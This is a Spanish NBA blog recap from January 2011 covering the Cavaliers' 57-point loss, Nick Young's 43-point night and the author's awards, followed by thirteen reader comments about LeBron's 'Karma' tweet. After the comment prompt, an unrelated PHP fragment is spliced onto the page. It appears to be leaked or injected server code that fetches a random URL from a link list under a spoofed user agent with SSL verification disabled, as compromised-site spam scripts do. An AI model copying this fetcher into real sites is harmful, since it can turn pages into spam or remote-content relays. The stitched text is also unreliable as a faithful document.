La Crónica (11/01/2011)

12 de January de 2011 por TheDeerHunter

Noche de contrastes. Mientras los Cleveland Cavaliers hacían un ridículo histórico anotando 57 puntos a los Lakers, convirtiéndose en el equipo más patético que se ha enfrentado nunca a los amarillos, los Wizards y los Kings nos brindaban un partido de 269 puntos o los Nuggets le endosaban 132 a los Phoenix Suns.

No comentaremos la pena de esperpento del Staples. Conviene más disfrutar de la que armó Nick Young contra los “powerizados” Kings. Tratando de mejorar su “equilibrio” próximamente cambiarán el nombre de “Arco” de su estadio por el de “Power Balance Arena”. De momento el anuncio del cambio les trajo la fortuna de aguantar hasta la prórroga un partido donde en condiciones normales habrían caído apaleados. Sin Tyreke, fueron García, Udrih y Landry quienes dieron un paso adelante. Jeter forzó la prórroga con una canasta incomprensiblemente fácil, pero en ella terminaron rindiéndose frente al ritmo imparable de los Wizards.

El partidazo de Afflalo junto con el regreso a la realidad de Melo, además de la eficacia de Lawson y JR Smith fueron demasiado para la ausente defensa de los Suns. El ataque les duró un cuarto así que para el descanso ya no había partido. Los hombres de Gentry se van de cabeza a la lotería y eso que los Blazers no están para grandes peleas. Ronnie Turiaf parecía el mejor Shaquille O’Neal ante ellos para una victoria fácil de los Knicks en el Rose Garden. Rudy se lució durante la primera parte por si suena la flauta y le fichan. Tampoco tenemos muy claro si el equipo de la gran manzana haría bien juntándole con Landry Fields. Se está ganando toda la confianza del mundo.

Mientras los Spurs no sudaron demasiado para doblegar a una de sus victimas favoritas. Nada menos que 5 faltas técnicas en 10 segundos que les pitaron a los Wolves. 16ª victoria consecutiva de los Spurs sobre ellos. Se dicen pronto ambos datos.

Por último los Pacers ganaron en Philadelphia en un gran partido de ambos. El partido de Atlanta recibiendo a los Bucks se aplazó por la grave tormenta de nieve.

PREMIOS

MVP: Al final se está demostrando que los Wizards no son los grandes perdedores del último megatraspaso. Además del buen rendimiento de Rashard Lewis la confianza en Nick Young le está dando alas. 43 puntos con una serie de 7 de 10 en triples. 4 rebotes y 3 asistencias para completar la mejor noche de su carrera.

El rookie: (Me encanta decir su nombre) Pooh Jeter, en ausencia de Tyreke fue importante en los minutos decisivos de su equipo. 11 asistencias, 4 rebotes, 1 robo… sólo 8 puntos, pero una de sus canastas fue para forzar la prórroga. No mencionamos a Cousins ni a Wall por sus malos porcentajes de tiro.

La sorpresa: La titularidad la abrazó Turiaf con entusiasmo. 19 puntos (con un único fallo), 10 rebotes, 3 asistencias, 3 robos y 2 tapones. Mucho más que su célebre función de agitar toallas.

La decepción: 1-9 de Mo Williams (-43 con él en pista), 3-10 de Antawn (-46), 1-8 Hickson (-29), 2-8 Manny Harris(-57) 1-12 Samardo Samuels (-24) Parece una especie de via crucis demoniaco.

El mayor esfuerzo en vano: Puede ser (cómo no) Kevin Love… o Beno Udrih dándolo todo contra un activo John Wall.

Comenta

13 comentarios a esta entrada

  1. rojorob dice:
    #1

    Sleep well, Cleveland.

    Tomorrow is a new and much brighter day….

    I PROMISE you that our energy, focus, capital, knowledge and experience will be directed at one thing and one thing only:

    DELIVERING YOU the championship you have long deserved and is long overdue….

      Citar

  2. TheDeerHunter dice:
    #2

    Y éste el mensaje de LeBron a sus ex- vía twitter:

    “Crazy. Karma is a b****. Gets you every time. It’s not good to wish bad on anybody. God sees everything!”

      Citar

  3. MagicJohnson32 dice:
    #3

    Me parece una bajeza lo de LeBron. Hoy no era el día para eso.

      Citar

  4. TheDeerHunter dice:
    #4

    Te equivocas… si existe un día para eso, hoy es el día para eso.

    Sangre!!! XD

      Citar

  5. Denise dice:
    #5

    El nivel de la NBA cada día es menor, como muestra los Cavs, o que un tío como Pooh Jeter esté haciendo buenos partidos, cuando era un “hacenumeros” en el descendido a la LEB Vive Menorca, y después lo cortaron en el Unicaja Málaga.
    Por cierto, su nombre es Eugene, pero creo que le apodan Pooh, por el Oso ese llamado Winnie the POOH, porque a Jeter le gusta mucho los dulces como el oso……xD

      Citar

  6. Denise dice:
    #6

    Rectifico, el mote se lo puso su abuela porque cuando nació se parecía al Oso Winnie the Pooh (según ella) …..xD

      Citar

  7. sergio dice:
    #7

    Solo decir que para mi el MVP del dia es Afflalo, que aparte es un jugador que me encanta.

    Me hace gracia ver como en marca traducen B**** por “mierda” (shit) cuando esta mas que claro que es “puta” (bitch).

    Sinceramente creo que la gente que jugamos habitualmente al baloncesto podriamos haber hecho mejor papel que los Cavs ayer.

      Citar

  8. Denise dice:
    #8

    No soy bilingue, pero la traducción no la veo mal, “bitch” significa pu… o zorra y sinónimos, pero en este contexto puede traducirse como “mierda”, puesto que para referirse a lo otro, debe ir dirigido el insulto a una mujer o hembra femenina, y el insulto va al karma.
    Es como si dices…”me cago en mi puta nación”, o “se me ha roto el puto coche” por ejemplo.

    Iverson se retira del baloncesto, supuestamente para siempre.

      Citar

  9. sergio dice:
    #9

    No Denise…. ha querido decir que el Karma es una puta.. literalmente. Juraria que alli es una palabra femenina. Alli se utiliza para muuuchas cosas que no estan referidas ni con la feminidad ni con la prostitucion. De todas maneras… a mi me recuerda a me llamo Earl xD

      Citar

  10. Lanegan dice:
    #10

    No será que la b… va por “bullshit”, entonces si que “mierda” no sería una mala traducción. saludos

      Citar

  11. sergio dice:
    #11

    Tambien lo pensé Lanegan, pero se ve que tiene 5 letras (supuestamente) –> B****, una por asterisco digo yo. Aunque vamos, esta es la discusion mas estupida de la historia jajaja. Sea lo que sea no habla nada bien de LeBron

      Citar

  12. AndiD dice:
    #12

    Nada, nada, dice BITCH, con todas las letras. Si entrais en su twitter lo podeis ver.
    Menudo payasete… y luego se queja de que el odio que le tiene la gente es por un “tema racial”. En fin, un gesto muy feo.

      Citar

  13. TheDeerHunter dice:
    #13

    Hoy negaba que el tweet era suyo, ojo. Lo del twitter es muy delicado… me refiero a autenticidad, claro.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>